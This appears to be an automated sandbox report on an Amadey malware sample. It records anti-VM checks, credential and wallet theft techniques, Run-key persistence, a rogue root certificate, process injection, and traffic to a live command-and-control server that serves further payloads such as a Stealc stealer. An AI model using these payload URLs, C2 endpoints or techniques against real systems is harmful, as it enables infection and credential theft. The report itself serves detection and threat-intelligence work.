amadey | c0b67097b25844387343e1ee60d277c90614858b00d8a103854bd8f454d10f02

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	c0b67097b25844387343e1ee60d277c90614858b00d8a103854bd8f454d10f02.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	c0b67097b25844387343e1ee60d277c90614858b00d8a103854bd8f454d10f02.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	c0b67097b25844387343e1ee60d277c90614858b00d8a103854bd8f454d10f02.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	c0b67097b25844387343e1ee60d277c90614858b00d8a103854bd8f454d10f02.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	axplong.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	Nework.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	RegAsm.exe

Executes dropped EXE 16 IoCs

pid	Process
3876	axplong.exe
4000	crypteda.exe
3976	BVoLOJehKw.exe
5008	esuXM2mLD0.exe
4800	Nework.exe
3880	Hkbsse.exe
2076	stealc_default2.exe
4512	BitcoinCore.exe
2076	axplong.exe
1724	Hkbsse.exe
3936	PureSyncInst.exe
2020	Amadeus.exe
4336	runtime.exe
3688	ovrflw.exe
3476	Hkbsse.exe
5040	axplong.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Wine	c0b67097b25844387343e1ee60d277c90614858b00d8a103854bd8f454d10f02.exe
Key opened	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Wine	axplong.exe

Loads dropped DLL 2 IoCs

pid	Process
2076	stealc_default2.exe
2076	stealc_default2.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Amadeus.exe = "C:\\Users\\Admin\\1000238002\\Amadeus.exe"	axplong.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\IlluminatedControls = "C:\\Users\\Admin\\Pictures\\Illumination.pif"	runtime.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
3432	c0b67097b25844387343e1ee60d277c90614858b00d8a103854bd8f454d10f02.exe
3876	axplong.exe
2076	axplong.exe
5040	axplong.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 4000 set thread context of 4020	4000	crypteda.exe	96
PID 4336 set thread context of 3200	4336	runtime.exe	116
PID 3936 set thread context of 396	3936	PureSyncInst.exe	118
PID 2020 set thread context of 3572	2020	Amadeus.exe	119
PID 3688 set thread context of 1600	3688	ovrflw.exe	125

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\axplong.job	c0b67097b25844387343e1ee60d277c90614858b00d8a103854bd8f454d10f02.exe
File created	C:\Windows\Tasks\Hkbsse.job	Nework.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
3164	396	WerFault.exe	118
2172	3572	WerFault.exe	119

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Amadeus.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	axplong.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BVoLOJehKw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	crypteda.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	esuXM2mLD0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Nework.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PureSyncInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c0b67097b25844387343e1ee60d277c90614858b00d8a103854bd8f454d10f02.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hkbsse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stealc_default2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ovrflw.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	stealc_default2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	stealc_default2.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	esuXM2mLD0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	esuXM2mLD0.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
3432	c0b67097b25844387343e1ee60d277c90614858b00d8a103854bd8f454d10f02.exe
3432	c0b67097b25844387343e1ee60d277c90614858b00d8a103854bd8f454d10f02.exe
3876	axplong.exe
3876	axplong.exe
2076	stealc_default2.exe
2076	stealc_default2.exe
3976	BVoLOJehKw.exe
3976	BVoLOJehKw.exe
5008	esuXM2mLD0.exe
5008	esuXM2mLD0.exe
5008	esuXM2mLD0.exe
5008	esuXM2mLD0.exe
2076	stealc_default2.exe
2076	stealc_default2.exe
5008	esuXM2mLD0.exe
5008	esuXM2mLD0.exe
2076	axplong.exe
2076	axplong.exe
5040	axplong.exe
5040	axplong.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	3976	BVoLOJehKw.exe
Token: SeBackupPrivilege	3976	BVoLOJehKw.exe
Token: SeSecurityPrivilege	3976	BVoLOJehKw.exe
Token: SeSecurityPrivilege	3976	BVoLOJehKw.exe
Token: SeSecurityPrivilege	3976	BVoLOJehKw.exe
Token: SeSecurityPrivilege	3976	BVoLOJehKw.exe
Token: SeDebugPrivilege	5008	esuXM2mLD0.exe
Token: SeDebugPrivilege	4336	runtime.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3432 wrote to memory of 3876	3432	c0b67097b25844387343e1ee60d277c90614858b00d8a103854bd8f454d10f02.exe	89
PID 3432 wrote to memory of 3876	3432	c0b67097b25844387343e1ee60d277c90614858b00d8a103854bd8f454d10f02.exe	89
PID 3432 wrote to memory of 3876	3432	c0b67097b25844387343e1ee60d277c90614858b00d8a103854bd8f454d10f02.exe	89
PID 3876 wrote to memory of 4000	3876	axplong.exe	95
PID 3876 wrote to memory of 4000	3876	axplong.exe	95
PID 3876 wrote to memory of 4000	3876	axplong.exe	95
PID 4000 wrote to memory of 4020	4000	crypteda.exe	96
PID 4000 wrote to memory of 4020	4000	crypteda.exe	96
PID 4000 wrote to memory of 4020	4000	crypteda.exe	96
PID 4000 wrote to memory of 4020	4000	crypteda.exe	96
PID 4000 wrote to memory of 4020	4000	crypteda.exe	96
PID 4000 wrote to memory of 4020	4000	crypteda.exe	96
PID 4000 wrote to memory of 4020	4000	crypteda.exe	96
PID 4000 wrote to memory of 4020	4000	crypteda.exe	96
PID 4000 wrote to memory of 4020	4000	crypteda.exe	96
PID 4000 wrote to memory of 4020	4000	crypteda.exe	96
PID 4020 wrote to memory of 3976	4020	RegAsm.exe	97
PID 4020 wrote to memory of 3976	4020	RegAsm.exe	97
PID 4020 wrote to memory of 3976	4020	RegAsm.exe	97
PID 4020 wrote to memory of 5008	4020	RegAsm.exe	99
PID 4020 wrote to memory of 5008	4020	RegAsm.exe	99
PID 4020 wrote to memory of 5008	4020	RegAsm.exe	99
PID 3876 wrote to memory of 4800	3876	axplong.exe	100
PID 3876 wrote to memory of 4800	3876	axplong.exe	100
PID 3876 wrote to memory of 4800	3876	axplong.exe	100
PID 4800 wrote to memory of 3880	4800	Nework.exe	103
PID 4800 wrote to memory of 3880	4800	Nework.exe	103
PID 4800 wrote to memory of 3880	4800	Nework.exe	103
PID 3876 wrote to memory of 2076	3876	axplong.exe	104
PID 3876 wrote to memory of 2076	3876	axplong.exe	104
PID 3876 wrote to memory of 2076	3876	axplong.exe	104
PID 3876 wrote to memory of 4512	3876	axplong.exe	106
PID 3876 wrote to memory of 4512	3876	axplong.exe	106
PID 3876 wrote to memory of 3936	3876	axplong.exe	112
PID 3876 wrote to memory of 3936	3876	axplong.exe	112
PID 3876 wrote to memory of 3936	3876	axplong.exe	112
PID 3876 wrote to memory of 2020	3876	axplong.exe	114
PID 3876 wrote to memory of 2020	3876	axplong.exe	114
PID 3876 wrote to memory of 2020	3876	axplong.exe	114
PID 3876 wrote to memory of 4336	3876	axplong.exe	115
PID 3876 wrote to memory of 4336	3876	axplong.exe	115
PID 4336 wrote to memory of 3200	4336	runtime.exe	116
PID 4336 wrote to memory of 3200	4336	runtime.exe	116
PID 4336 wrote to memory of 3200	4336	runtime.exe	116
PID 4336 wrote to memory of 3200	4336	runtime.exe	116
PID 4336 wrote to memory of 3200	4336	runtime.exe	116
PID 4336 wrote to memory of 3200	4336	runtime.exe	116
PID 4336 wrote to memory of 3200	4336	runtime.exe	116
PID 4336 wrote to memory of 3200	4336	runtime.exe	116
PID 4336 wrote to memory of 3200	4336	runtime.exe	116
PID 4336 wrote to memory of 3200	4336	runtime.exe	116
PID 3200 wrote to memory of 3688	3200	RegAsm.exe	117
PID 3200 wrote to memory of 3688	3200	RegAsm.exe	117
PID 3200 wrote to memory of 3688	3200	RegAsm.exe	117
PID 3936 wrote to memory of 396	3936	PureSyncInst.exe	118
PID 3936 wrote to memory of 396	3936	PureSyncInst.exe	118
PID 3936 wrote to memory of 396	3936	PureSyncInst.exe	118
PID 3936 wrote to memory of 396	3936	PureSyncInst.exe	118
PID 3936 wrote to memory of 396	3936	PureSyncInst.exe	118
PID 3936 wrote to memory of 396	3936	PureSyncInst.exe	118
PID 3936 wrote to memory of 396	3936	PureSyncInst.exe	118
PID 3936 wrote to memory of 396	3936	PureSyncInst.exe	118
PID 3936 wrote to memory of 396	3936	PureSyncInst.exe	118
PID 2020 wrote to memory of 3572	2020	Amadeus.exe	119

C:\Users\Admin\AppData\Local\Temp\c0b67097b25844387343e1ee60d277c90614858b00d8a103854bd8f454d10f02.exe
"C:\Users\Admin\AppData\Local\Temp\c0b67097b25844387343e1ee60d277c90614858b00d8a103854bd8f454d10f02.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3432
- C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
  "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3876
- - C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
    "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4000
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4020
    - - C:\Users\Admin\AppData\Roaming\BVoLOJehKw.exe
        
        "C:\Users\Admin\AppData\Roaming\BVoLOJehKw.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3976
    - - C:\Users\Admin\AppData\Roaming\esuXM2mLD0.exe
        
        "C:\Users\Admin\AppData\Roaming\esuXM2mLD0.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5008
- - C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
    "C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4800
  - - C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
      "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3880
- - C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
    "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:2076
- - C:\Users\Admin\AppData\Local\Temp\1000191001\BitcoinCore.exe
    "C:\Users\Admin\AppData\Local\Temp\1000191001\BitcoinCore.exe"
    3⤵
    - Executes dropped EXE
    PID:4512
- - C:\Users\Admin\AppData\Local\Temp\1000228001\PureSyncInst.exe
    "C:\Users\Admin\AppData\Local\Temp\1000228001\PureSyncInst.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3936
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:396
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 396 -s 1168
        5⤵
        Program crash
        
        PID:3164
- - C:\Users\Admin\1000238002\Amadeus.exe
    "C:\Users\Admin\1000238002\Amadeus.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2020
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3572
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3572 -s 1140
        5⤵
        Program crash
        
        PID:2172
- - C:\Users\Admin\AppData\Local\Temp\1000239001\runtime.exe
    "C:\Users\Admin\AppData\Local\Temp\1000239001\runtime.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4336
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3200
    - - C:\Users\Admin\AppData\Local\Temp\1000277001\ovrflw.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000277001\ovrflw.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:3688
      - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1600

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:1724

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 396 -ip 396
1⤵
PID:1288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3572 -ip 3572
1⤵
PID:3052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1600 -ip 1600
1⤵
PID:640

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:3476

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5040

Network

DNS

149.220.183.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

149.220.183.52.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:41:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:41:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:41:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.16/inc/crypteda.exe

axplong.exe

Remote address:

185.215.113.16:80

Request

GET /inc/crypteda.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:41:13 GMT
Content-Type: application/octet-stream
Content-Length: 1104936
Last-Modified: Mon, 19 Aug 2024 12:56:48 GMT
Connection: keep-alive
ETag: "66c34110-10dc28"
Accept-Ranges: bytes
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:41:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:41:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.16/inc/stealc_default2.exe

axplong.exe

Remote address:

185.215.113.16:80

Request

GET /inc/stealc_default2.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:41:16 GMT
Content-Type: application/octet-stream
Content-Length: 192000
Last-Modified: Sat, 24 Aug 2024 14:58:01 GMT
Connection: keep-alive
ETag: "66c9f4f9-2ee00"
Accept-Ranges: bytes
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:41:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:41:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:41:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.16/Jo89Ku7d/index.php

axplong.exe

Remote address:

185.215.113.16:80

Request

POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:42:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.16/inc/Amadeus.exe

axplong.exe

Remote address:

185.215.113.16:80

